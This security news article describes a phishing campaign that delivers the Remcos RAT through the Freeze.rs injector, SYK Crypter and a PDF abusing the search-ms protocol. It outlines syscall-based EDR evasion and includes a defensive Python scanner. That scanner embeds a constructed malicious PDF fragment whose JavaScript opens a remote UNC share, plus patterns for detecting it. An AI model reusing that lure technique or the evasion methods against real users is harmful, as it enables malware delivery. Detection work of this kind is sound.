
XWorm and Remcos RAT Successfully Infect Critical Infrastructure, Evading EDRs


Freeze[.]rs, a Rust-based injector, has been employed as a tool to launch a sophisticated phishing campaign that delivers malware to its targets. The campaign, discovered by Fortinet’s FortiGuard Labs in July, has been targeting victims in Europe and North America, particularly in the specialty chemical and industrial product supplier sectors. The attackers have successfully bypassed endpoint detection and response (EDR) using a malicious PDF file.

Upon further investigation, FortiGuard Labs discovered that the phishing campaign involved the use of a tool called SYK Crypter, which is commonly used to distribute malware via the Discord community chat platform. The tool was responsible for loading a remote access Trojan (RAT) known as Remcos, which is capable of controlling and monitoring Windows devices.

The key element of this attack chain is the Freeze[.]rs injector, a Red Team tool designed to create payloads that can bypass EDR security measures. The tool utilizes the ‘search-ms’ protocol to access an LNK file on a remote server. Clicking on the LNK file triggers a PowerShell script that executes Freeze[.]rs and SYK Crypter, allowing for further offensive actions.

Cara Lin, a researcher at FortiGuard Labs, explains that the Freeze[.]rs injector uses NT syscalls to inject shellcode, avoiding the standard API calls that EDR products usually monitor. By creating the process in a suspended state, the attacker ensures that only a minimal set of DLLs is loaded, none of them EDR-specific. The syscall stubs within Ntdll.dll therefore remain unhooked, and the injection evades EDR detection.

The attack chain begins with a booby-trapped PDF file that works in conjunction with the ‘search-ms’ protocol to deliver the payload. Embedded JavaScript invokes a ‘search-ms’ URI, which opens a Windows Explorer search window showing the LNK file hosted on a remote server. The LNK file, disguised with a PDF icon, tricks victims into believing that it originates from their own system and is legitimate.
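As an added example (not code from Fortinet's report or this article), the following Python triage check scans raw PDF bytes for embedded JavaScript objects and ‘search-ms’ URIs, and flags a search crumb that points at a remote location rather than a local folder. The parameter layout (query, crumb=location:, displayname) is assumed from Microsoft's documented search-ms format; both PDF fragments and the 203.0.113.10 address are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed PDF fragments for illustration; neither is a real sample.
# The first carries an OpenAction JavaScript that launches a search-ms: URI
# whose crumb points the Explorer search window at a remote UNC share.
MALICIOUS_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /JavaScript /JS (app.launchURL\\(\"search-ms:query=Invoice"
    b"&crumb=location:%5C%5C203.0.113.10%5Cdocs&displayname=Downloads\", true\\)) >> endobj\n"
)
BENIGN_PDF = b"%PDF-1.7\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"

SEARCH_MS_RE = re.compile(rb"search-ms:[^\s\"'()<>]+", re.IGNORECASE)
JS_RE = re.compile(rb"/(JavaScript|JS)\b")


def parse_search_ms(uri: str) -> dict:
    """Split a search-ms: URI into its parameters and flag a non-local crumb."""
    params = {}
    for part in uri[len("search-ms:"):].split("&"):
        key, _, value = part.partition("=")
        params[key.lower()] = unquote(value)
    location = params.get("crumb", "")
    if location.lower().startswith("location:"):
        location = location[len("location:"):]
    # A UNC path or URL means the listed files come from a server, not the user's disk.
    remote = location.startswith("\\\\") or location.lower().startswith(
        ("http://", "https://", "file://")
    )
    return {"uri": uri, "query": params.get("query", ""),
            "location": location, "remote": remote}


def scan_pdf(data: bytes) -> dict:
    """Report embedded JavaScript and any search-ms: URIs found in the PDF bytes."""
    uris = [m.group(0).decode("latin-1") for m in SEARCH_MS_RE.finditer(data)]
    return {
        "has_javascript": JS_RE.search(data) is not None,
        "search_ms": [parse_search_ms(u) for u in uris],
    }


if __name__ == "__main__":
    for name, pdf in (("malicious", MALICIOUS_PDF), ("benign", BENIGN_PDF)):
        print(name, scan_pdf(pdf))
```

A PDF that both contains JavaScript and references a remote search-ms location is worth quarantining for analysis before it reaches a mailbox.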

Additionally, the SYK Crypter plays a role in ensuring persistence by copying itself to the Startup folder. It encrypts the configuration and the compressed payload to obfuscate its malicious activities. The attackers employ a multi-layered strategy involving encoding, string obfuscation, and payload encryption to hinder static analysis. The malware can also terminate itself if it detects the presence of a specific security vendor.

Phishing attacks continue to be a pervasive threat, with a high percentage of companies experiencing at least one email phishing attack in the past year. The tactics used in these attacks have become more sophisticated, adapting to new technology and user behavior. The research emphasizes the importance of maintaining up-to-date software, providing regular training to employees, and utilizing advanced security tools to defend against evolving phishing attacks.

It is notable that phishing simulation training appears to be more effective in critical infrastructure organizations compared to other sectors. Employees who receive such training are more likely to correctly identify and report malicious email attacks. This highlights the need for ongoing education and awareness programs to mitigate the risks posed by phishing attacks.
